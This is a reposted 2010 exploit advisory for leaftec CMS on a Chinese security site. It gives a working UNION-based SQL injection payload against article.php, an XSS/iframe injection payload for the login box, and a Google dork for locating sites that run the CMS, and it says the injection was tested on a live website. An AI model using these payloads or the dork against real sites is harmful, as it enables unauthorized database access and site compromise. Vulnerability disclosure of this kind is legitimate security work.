首页 > 安全 > 网站安全 > 正文
leaftec cms multiple vulnerabilities
2010-03-27 14:00:46     我来说两句 
收藏    我要投稿    [字体: ]

# Exploit Title: leaftec cms multiple vulnerabilities 

# Date: 21.03.2010 

# Author: Valentin Höbel 

# Version:  

# Tested on: Debian etch  

# CVE :   

# Code :  

  

  

  

:: General information 

:: leaftec cms multiple vulnerabilities discovered 

:: by Valentin Höbel 

:: valentin@xenuser.org 

  

:: Product information 

:: Name = leaftec cms 

:: Vendor = leaftec 

:: Vendor Website = http://www.leaftec.de/ 

:: About the product = php">http://www.leaftec.de/serv_cms.php 

:: Affected versions =  

:: Google dork: e.g. "© 2006 leaftec Design" 

  

  

:: Vulnerabilities 

  

#1 SQL Injection 

Sadly the CMS is not available for free download but some German companies are using it. 

leaftec cms contains a blog feature which displays written content, file: article.php.  

  

Vulnerable URL: 

http://www.some-cool-domain.tld/article.php?id=XX 

  

Examples for testing and injecting SQL stuff: 

http://www.some-cool-domain.tld/article.php?id= 

http://www.some-cool-domain.tld/article.php?id=" 

http://www.some-cool-domain.tld/article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version()),7-- 

(Tested on a live website using leaftec cms.) 

-------------------------------------------------------------------------------------------------------- 

  

  

#2 XSS / HTML Code Injection 

Several parts of the CMS allow HTML and Java Script code injection, e.g. the login box. 

After submitting the form the cms puts a red border around the login and password field but 

also implements the injected code into the website. 

  

Example for HTML code: 

"><iframe src=http://www.google.de></iframe> 

-------------------------------------------------------------------------------------------------------- 

  

  

  

:: Additional information 

:: Vendor contacted = 21.03.2010 

:: Vulnerabilities fixed = no reply received 

:: Solution = Upgrade to version XX or higher if available

点击复制链接 与QQ/MSN好友分享!
分享到:
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力  
上一篇:连接Oracle服务器后如何获取权限
下一篇:SAP MaxDB Malformed Handshake Request Remote Code&
相关文章
图文推荐
排行
热门

关于我们 | 联系我们 | 投资合作 | 广告服务 | 隐私声明 | 版权申明 | 免责条款 | 网站地图 | Vip会员区
版权所有: 红黑联盟--致力于做最好的IT技术学习网站